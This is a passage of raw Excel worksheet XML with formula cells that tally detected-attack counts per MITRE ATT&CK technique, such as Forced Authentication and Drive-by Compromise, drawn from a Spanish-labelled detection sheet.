        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO31" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>429</v>
      </c>
      <c r="BP31" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>429</v>
      </c>
      <c r="BQ31" s="4" t="str">
        <f t="shared" si="10"/>
        <v>429 (429)</v>
      </c>
      <c r="BR31" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS31" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT31" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>217</v>
      </c>
      <c r="BV31" s="292">
        <v>212</v>
      </c>
      <c r="BW31" s="322">
        <v>212</v>
      </c>
      <c r="BX31" s="4" t="str">
        <f t="shared" si="11"/>
        <v>212 (212)</v>
      </c>
      <c r="BY31" s="12">
        <v>1</v>
      </c>
      <c r="BZ31" s="13">
        <v>1</v>
      </c>
      <c r="CA31" s="394">
        <v>212</v>
      </c>
      <c r="CB31" s="288">
        <v>424</v>
      </c>
      <c r="CC31" s="4">
        <v>424</v>
      </c>
      <c r="CD31" s="4" t="str">
        <f t="shared" si="12"/>
        <v>424 (424)</v>
      </c>
      <c r="CE31" s="4">
        <v>1</v>
      </c>
      <c r="CF31" s="4">
        <v>1</v>
      </c>
      <c r="CG31" s="13">
        <v>1</v>
      </c>
      <c r="CH31" s="394">
        <v>212</v>
      </c>
    </row>
    <row r="32" spans="1:86" ht="15" customHeight="1">
      <c r="A32" s="4">
        <f t="shared" si="13"/>
        <v>30</v>
      </c>
      <c r="B32" s="4" t="str">
        <f>IFERROR(VLOOKUP(A32,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1187</v>
      </c>
      <c r="C32" s="493" t="str">
        <f>IFERROR(VLOOKUP(B32,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Forced Authentication</v>
      </c>
      <c r="D32" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B32)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E32" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>11</v>
      </c>
      <c r="F32" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (11)</v>
      </c>
      <c r="G32" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H32" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I32" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J32" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K32" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M32" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N32" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O32" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P32" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q32" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S32" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>0</v>
      </c>
      <c r="T32" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>0</v>
      </c>
      <c r="U32" s="4" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V32" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="W32" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0</v>
      </c>
      <c r="X32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>0</v>
      </c>
      <c r="Y32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>15</v>
      </c>
      <c r="Z32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>15</v>
      </c>
      <c r="AA32" s="322" t="str">
        <f t="shared" si="3"/>
        <v>15 (15)</v>
      </c>
      <c r="AB32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="AC32" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>3</v>
      </c>
      <c r="AE32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>37</v>
      </c>
      <c r="AF32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>35</v>
      </c>
      <c r="AG32" s="322" t="str">
        <f t="shared" si="4"/>
        <v>35 (37)</v>
      </c>
      <c r="AH32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>20</v>
      </c>
      <c r="AI32" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>10</v>
      </c>
      <c r="AK32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>52</v>
      </c>
      <c r="AL32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>50</v>
      </c>
      <c r="AM32" s="322" t="str">
        <f t="shared" si="5"/>
        <v>50 (52)</v>
      </c>
      <c r="AN32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>30</v>
      </c>
      <c r="AO32" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>10</v>
      </c>
      <c r="AQ32" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR32" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS32" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT32" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU32" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY32" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ32" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA32" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC32" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>0</v>
      </c>
      <c r="BD32" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>0</v>
      </c>
      <c r="BE32" s="4" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF32" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>0</v>
      </c>
      <c r="BG32" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0</v>
      </c>
      <c r="BH32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>0</v>
      </c>
      <c r="BI32" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>7</v>
      </c>
      <c r="BJ32" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>7</v>
      </c>
      <c r="BK32" s="322" t="str">
        <f t="shared" si="9"/>
        <v>7 (7)</v>
      </c>
      <c r="BL32" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM32" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>7</v>
      </c>
      <c r="BO32" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>33</v>
      </c>
      <c r="BP32" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>33</v>
      </c>
      <c r="BQ32" s="4" t="str">
        <f t="shared" si="10"/>
        <v>33 (33)</v>
      </c>
      <c r="BR32" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS32" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>7</v>
      </c>
      <c r="BT32" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU32" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>10</v>
      </c>
      <c r="BV32" s="292">
        <v>13</v>
      </c>
      <c r="BW32" s="322">
        <v>13</v>
      </c>
      <c r="BX32" s="4" t="str">
        <f t="shared" si="11"/>
        <v>13 (13)</v>
      </c>
      <c r="BY32" s="12">
        <v>2</v>
      </c>
      <c r="BZ32" s="13">
        <v>1</v>
      </c>
      <c r="CA32" s="394">
        <v>8</v>
      </c>
      <c r="CB32" s="288">
        <v>26</v>
      </c>
      <c r="CC32" s="4">
        <v>21</v>
      </c>
      <c r="CD32" s="4" t="str">
        <f t="shared" si="12"/>
        <v>21 (26)</v>
      </c>
      <c r="CE32" s="4">
        <v>2</v>
      </c>
      <c r="CF32" s="4">
        <v>1</v>
      </c>
      <c r="CG32" s="13">
        <v>1</v>
      </c>
      <c r="CH32" s="394">
        <v>8</v>
      </c>
    </row>
    <row r="33" spans="1:86" ht="15" customHeight="1">
      <c r="A33" s="4">
        <f t="shared" si="13"/>
        <v>31</v>
      </c>
      <c r="B33" s="4" t="str">
        <f>IFERROR(VLOOKUP(A33,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1189</v>
      </c>
      <c r="C33" s="493" t="str">
        <f>IFERROR(VLOOKUP(B33,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="D33" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B33)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E33" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F33" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (5)</v>
      </c>
      <c r="G33" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>4</v>
      </c>
      <c r="H33" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>3</v>
      </c>
      <c r="I33" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (4)</v>
      </c>
      <c r="J33" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K33" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.5</v>
      </c>
      <c r="L33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>3</v>
      </c>
      <c r="M33" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>1</v>
      </c>
      <c r="N33" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>1</v>
      </c>
      <c r="O33" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P33" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q33" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0.5</v>
      </c>
      <c r="R33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S33" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>5</v>
      </c>
      <c r="T33" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>4</v>
      </c>
      <c r="U33" s="4" t="str">
        <f t="shared" si="2"/>
        <v>4 (5)</v>
      </c>
      <c r="V33" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W33" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>4</v>
      </c>
      <c r="Y33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>546</v>
      </c>
      <c r="Z33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>11</v>
      </c>
      <c r="AA33" s="322" t="str">
        <f t="shared" si="3"/>
        <v>11 (546)</v>
      </c>
      <c r="AB33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC33" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>5</v>
      </c>
      <c r="AE33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>12</v>
      </c>
      <c r="AF33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>8</v>
      </c>
      <c r="AG33" s="322" t="str">
        <f t="shared" si="4"/>
        <v>8 (12)</v>
      </c>
      <c r="AH33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>8</v>
      </c>
      <c r="AI33" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>558</v>
      </c>
      <c r="AL33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>19</v>
      </c>
      <c r="AM33" s="322" t="str">
        <f t="shared" si="5"/>
        <v>19 (558)</v>
      </c>
      <c r="AN33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>13</v>
      </c>
      <c r="AO33" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>5</v>
      </c>
      <c r="AQ33" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR33" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS33" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT33" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU33" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>4</v>
      </c>
      <c r="AX33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY33" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (4)</v>
      </c>
      <c r="AZ33" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA33" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.5</v>
      </c>
      <c r="BB33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC33" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>9</v>
      </c>
      <c r="BD33" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>5</v>
      </c>
      <c r="BE33" s="4" t="str">
        <f t="shared" si="8"/>
        <v>5 (9)</v>
      </c>
      <c r="BF33" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG33" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>5</v>
      </c>
      <c r="BI33" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>3</v>
      </c>
      <c r="BJ33" s="322">
